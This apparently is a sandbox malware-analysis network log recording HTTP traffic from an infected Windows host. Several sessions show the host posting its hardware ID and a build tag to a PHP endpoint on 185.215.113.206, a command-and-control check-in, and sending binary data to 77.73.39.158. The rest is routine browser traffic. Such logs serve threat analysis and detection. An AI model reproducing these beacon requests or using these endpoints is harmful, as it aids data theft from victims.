Dec 8, 2024 19:54:22.070127010 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 08:27:46 GMT Age: 37595 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.4	49984	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:08.159889936 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 19:54:09.679495096 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:54:09.688587904 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 2d 2d 0d 0a Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="build"stok------CAAAAFBKFIECAAKECGCA--
Dec 8, 2024 19:54:10.136908054 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.4	49987	77.73.39.158	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:08.640846968 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue
Dec 8, 2024 19:54:09.988755941 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.4	50069	185.215.113.206	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:40.302844048 CET	90	OUT	GET / HTTP/1.1 Host: 185.215.113.206 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 19:54:41.597953081 CET	203	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 19:54:41.779552937 CET	412	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJD Host: 185.215.113.206 Content-Length: 210 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 32 36 36 42 33 32 30 39 44 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 2d 2d 0d 0a Data Ascii: ------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="hwid"3266B3209D0F807656615------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="build"stok------JJJJEBGDAFHJEBGDGIJD--
Dec 8, 2024 19:54:42.232131004 CET	210	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:54:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.4	50088	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:46.516572952 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
Dec 8, 2024 19:54:47.606872082 CET	298	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sun, 08 Dec 2024 00:07:44 GMT Age: 67623 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
Dec 8, 2024 19:54:47.820900917 CET	303	OUT	GET /canonical.html HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cache-Control: no-cache Pragma: no-cache Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	50106	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:54:47.740494013 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49732	216.58.208.228	443	7860	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:52:12 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-08 18:52:13 UTC	1266	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:52:13 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-8L9mn5kyKD7bfMrCV1np4A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-08 18:52:13 UTC	124	IN	Data Raw: 31 39 31 66 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 67 72 65 61 74 20 63 69 72 63 6c 65 20 69 6e 64 69 61 6e 61 20 6a 6f 6e 65 73 22 2c 22 61 62 75 20 64 68 61 62 69 20 67 72 61 6e 64 20 70 72 69 78 22 2c 22 70 6f 70 65 20 66 72 61 6e 63 69 73 22 2c 22 65 70 69 63 20 67 61 6d 65 73 20 66 6f 72 74 6e 69 74 65 20 77 72 61 70 70 65 64 22 2c 22 68 69 6c 74 6f 6e 20 68 6f 6e Data Ascii: 191f)]}'["",["great circle indiana user","abu dhabi grand prix","pope francis","epic games fortnite wrapped","hilton hon
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 6f 72 73 20 64 65 6c 74 61 20 73 74 61 74 75 73 20 6d 61 74 63 68 22 2c 22 73 70 61 63 65 78 20 73 74 61 72 6c 69 6e 6b 20 6c 61 75 6e 63 68 20 63 61 70 65 20 63 61 6e 61 76 65 72 61 6c 22 2c 22 6a 61 63 6f 62 20 74 72 6f 75 62 61 20 72 61 6e 67 65 72 73 20 74 72 61 64 65 22 2c 22 73 65 76 65 72 61 6e 63 65 20 73 65 61 73 6f 6e 20 32 20 6f 66 66 69 63 69 61 6c 20 74 72 61 69 6c 65 72 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 Data Ascii: ors delta status match","spacex starlink launch cape canaveral","jacob trouba rangers trade","severance season 2 official trailer"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 56 54 6c 50 63 55 46 72 53 57 39 4c 63 7a 56 4b 59 6c 4e 4f 54 6a 64 42 63 6a 4e 4f 4e 32 6b 72 54 6a 42 73 55 44 41 33 62 44 6c 47 53 6c 4e 61 59 6c 46 74 62 6d 6c 75 61 7a 46 50 61 47 70 46 5a 7a 63 34 5a 30 4a 35 55 55 49 31 5a 58 63 30 52 6e 55 7a 59 6b 52 71 53 48 6c 54 59 6d 52 4b 57 47 46 36 63 48 52 34 4e 55 70 55 62 45 35 76 51 55 31 47 51 6c 4a 78 65 6d 52 52 56 6d 78 54 54 58 4e 69 63 55 4e 6b 53 6d 31 70 4d 31 6c 76 4d 47 4e 30 64 6c 45 32 62 55 59 78 55 47 52 70 54 6b 35 36 57 54 4e 31 55 58 42 4f 63 32 52 73 53 6c 46 57 4b 32 46 61 54 6c 4e 78 4b 31 70 61 62 6b 30 77 4d 56 64 4b 57 6c 6b 79 64 57 39 68 55 47 49 30 56 31 4a 58 53 47 5a 56 55 58 56 6e 56 7a 68 34 64 6d 4a 35 4f 46 64 30 54 46 68 74 56 6a 46 6b 59 57 6c 77 4d 6d 38 30 61 6b 6b Data Ascii: VTlPcUFrSW9LczVKYlNOTjdBcjNON2krTjBsUDA3bDlGSlNaYlFtbmluazFPaGpFZzc4Z0J5UUI1ZXc0RnUzYkRqSHlTYmRKWGF6cHR4NUpUbE5vQU1GQlJxemRRVmxTTXNicUNkSm1pM1lvMGN0dlE2bUYxUGRpTk56WTN1UXBOc2RsSlFWK2FaTlNxK1pabk0wMVdKWlkydW9hUGI0V1JXSGZVUXVnVzh4dmJ5OFd0TFhtVjFkYWlwMm80akk
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 6c 46 4e 52 55 4a 6e 59 30 4e 42 5a 69 39 46 51 55 52 4a 55 55 46 42 53 55 4e 42 55 55 6c 45 51 6d 64 4e 53 45 4a 52 51 55 46 42 51 55 46 42 51 55 46 46 51 30 46 33 55 56 4a 42 51 56 56 54 53 56 52 46 52 30 56 35 53 6b 4a 56 56 30 56 56 59 32 56 46 56 6b 5a 70 54 57 74 5a 63 55 68 43 54 57 74 4b 62 47 74 61 56 43 39 34 51 55 46 59 51 56 46 46 51 6b 46 52 52 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 44 51 55 46 46 52 43 38 34 55 55 46 4b 55 6b 56 42 51 57 64 46 52 45 46 52 5a 30 52 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 56 44 51 58 68 46 55 33 4e 52 55 56 52 4a 56 55 5a 53 57 56 70 49 55 6b 31 59 52 30 49 76 4f 57 39 42 52 45 46 4e 51 6b 46 42 53 56 4a 42 65 45 56 42 Data Ascii: UFBQUFBQUFBQUFBQlFNRUJnY0NBZi9FQURJUUFBSUNBUUlEQmdNSEJRQUFBQUFBQUFFQ0F3UVJBQVVTSVRFR0V5SkJVV0VVY2VFVkZpTWtZcUhCTWtKbGtaVC94QUFYQVFFQkFRRUFBQUFBQUFBQUFBQUFBQUFDQUFFRC84UUFKUkVBQWdFREFRZ0RBQUFBQUFBQUFBQUFBQUVDQXhFU3NRUVRJVUZSWVpIUk1YR0IvOW9BREFNQkFBSVJBeEVB
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 30 59 6c 6c 4b 53 7a 45 32 63 6d 4e 70 4d 6d 30 77 53 6e 46 72 63 33 4e 73 5a 6a 67 31 52 6d 6c 51 64 6c 68 61 4e 55 46 43 61 6d 38 7a 52 6d 70 43 4e 6b 4a 53 61 6b 49 31 4e 6e 70 4b 52 6e 56 61 5a 48 5a 4c 4f 57 6c 6d 57 53 74 35 54 7a 6b 77 63 6e 52 58 56 31 4e 43 53 58 45 34 59 7a 6c 58 55 31 4a 50 4f 46 46 49 54 57 46 55 51 6a 49 30 56 54 68 4b 65 6e 68 77 65 69 39 42 53 32 6f 31 4f 55 35 69 54 48 4e 30 51 32 74 75 57 6c 42 68 51 56 5a 56 4c 32 74 76 5a 6b 77 35 51 54 46 4b 53 6d 55 7a 5a 33 68 7a 53 54 6c 73 53 45 64 52 5a 55 68 70 64 47 39 43 62 6a 4e 34 63 54 46 7a 64 45 70 30 64 54 4a 6c 61 6c 4a 6b 64 7a 64 57 62 30 56 70 54 45 52 76 55 33 46 6e 57 69 39 69 56 30 6f 7a 62 47 4e 56 62 7a 51 77 62 57 35 68 4e 32 45 31 63 44 6c 6c 62 6a 4a 59 5a 45 Data Ascii: 0YllKSzE2cmNpMm0wSnFrc3NsZjg1RmlQdlhaNUFCam8zRmpCNkJSakI1NnpKRnVaZHZLOWlmWSt5TzkwcnRXV1NCSXE4YzlXU1JPOFFITWFUQjI0VThKenhwei9BS2o1OU5iTHN0Q2tuWlBhQVZVL2tvZkw5QTFKSmUzZ3hzSTlsSEdRZUhpdG9CbjN4cTFzdEp0dTJlalJkdzdWb0VpTERvU3FnWi9iV0ozbGNVbzQwbW5hN2E1cDllbjJYZE
2024-12-08 18:52:13 UTC	755	IN	Data Raw: 6d 51 33 5a 57 56 42 4e 30 70 48 55 57 68 70 55 57 56 45 61 6e 64 76 57 56 6c 54 61 48 4a 54 53 57 4e 54 63 56 5a 51 5a 32 59 79 63 56 70 6b 56 6e 51 79 53 45 78 6e 5a 54 68 5a 63 47 39 74 4e 30 6c 68 63 55 39 51 63 7a 68 6a 5a 7a 68 77 52 6c 41 78 62 31 70 6b 4f 57 68 69 65 56 4e 4c 55 6d 70 77 61 32 46 72 53 31 52 72 54 57 63 33 64 6b 6b 77 59 31 6c 45 56 6c 42 54 5a 57 52 44 4f 57 4d 78 61 32 46 6b 59 55 30 77 57 55 31 72 65 44 52 57 52 55 64 55 61 79 74 57 51 57 52 69 4e 31 56 77 53 47 56 34 4d 6b 5a 77 64 57 46 53 62 55 46 4d 51 57 4e 56 53 54 64 52 4d 30 31 72 4d 6e 42 36 55 56 4a 54 52 6b 46 4a 65 6d 64 6e 4e 48 6c 52 51 69 74 30 54 6d 52 5a 64 57 68 31 52 31 5a 6b 5a 47 78 51 64 46 70 49 51 54 46 79 52 54 4a 76 4d 30 74 30 5a 48 4a 4d 52 6d 4e 54 Data Ascii: mQ3ZWVBN0pHUWhpUWVEandvWVlTaHJTSWNTcVZQZ2YycVpkVnQySExnZThZcG9tN0lhcU9QczhjZzhwRlAxb1pkOWhieVNLUmpwa2FrS1RrTWc3dkkwY1lEVlBTZWRDOWMxa2FkYU0wWU1reDRWRUdUaytWQWRiN1VwSGV4MkZwdWFSbUFMQWNVSTdRM01rMnB6UVJTRkFJemdnNHlRQit0TmRZdWh1R1ZkZGxQdFpIQTFyRTJvM0t0ZHJMRmNT
2024-12-08 18:52:13 UTC	91	IN	Data Raw: 35 35 0d 0a 6f 33 57 56 64 70 56 44 4d 30 59 54 4a 59 4d 45 35 32 53 57 51 79 65 6e 4a 72 61 6d 63 31 4f 47 56 6c 59 57 5a 61 53 56 42 54 63 48 56 49 52 48 4a 35 52 44 55 77 53 48 59 34 51 56 52 47 64 6b 5a 72 56 47 46 34 65 56 5a 72 56 47 49 33 55 7a 56 48 54 31 42 0d 0a Data Ascii: 55o3WVdpVDM0YTJYME52SWQyenJramc1OGVlYWZaSVBTcHVIRHJ5RDUwSHY4QVRGdkZrVGF4eVZrVGI3UzVHT1B
2024-12-08 18:52:13 UTC	1038	IN	Data Raw: 34 30 37 0d 0a 72 59 7a 42 73 64 48 52 45 4f 46 52 56 56 6e 42 74 65 6a 49 77 4d 48 4a 46 64 48 5a 71 52 57 4e 6e 53 79 74 7a 56 30 6b 35 4d 6c 46 4e 56 6d 39 51 57 6a 49 34 61 44 41 79 65 58 52 36 54 30 52 70 4e 45 64 59 61 31 56 72 4e 44 68 50 55 47 4e 68 62 7a 5a 69 4d 6d 46 31 52 47 4e 76 4d 54 59 33 65 56 4a 71 51 6b 4e 49 52 7a 4e 51 62 6c 52 69 52 46 6c 34 56 46 46 48 54 7a 52 71 55 6a 45 7a 53 47 64 71 64 30 39 50 55 47 78 53 4e 46 64 77 63 6d 46 52 5a 6b 70 79 4d 32 35 4a 57 56 4a 6f 61 46 4e 6c 53 56 4e 52 55 33 45 32 53 47 39 57 4e 58 49 77 59 6c 49 72 4e 57 78 4f 51 6d 38 35 54 6e 56 4f 55 47 4e 35 59 56 52 50 56 6b 68 56 64 33 6c 49 53 32 34 7a 52 33 49 78 63 48 49 34 54 48 56 5a 59 69 74 4e 4d 6a 67 32 4f 45 31 48 4e 6c 5a 59 62 54 6c 34 4d Data Ascii: 407rYzBsdHREOFRVVnBtejIwMHJFdHZqRWNnSytzV0k5MlFNVm9QWjI4aDAyeXR6T0RpNEdYa1VrNDhPUGNhbzZiMmF1RGNvMTY3eVJqQkNIRzNQblRiRFl4VFFHTzRqUjEzSGdqd09PUGxSNFdwcmFRZkpyM25JWVJoaFNlSVNRU3E2SG9WNXIwYlIrNWxOQm85TnVOUGN5YVRPVkhVd3lIS24zR3IxcHI4THVZYitNMjg2OE1HNlZYbTl4M
2024-12-08 18:52:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	216.58.208.228	443	7860	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:52:12 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	216.58.208.228	443	7860	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:52:13 UTC	510	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-08 18:52:13 UTC	1018	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Sun, 08 Dec 2024 18:52:13 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-08 18:52:13 UTC	372	IN	Data Raw: 32 30 64 36 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 20d6)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-08 18:52:13 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e 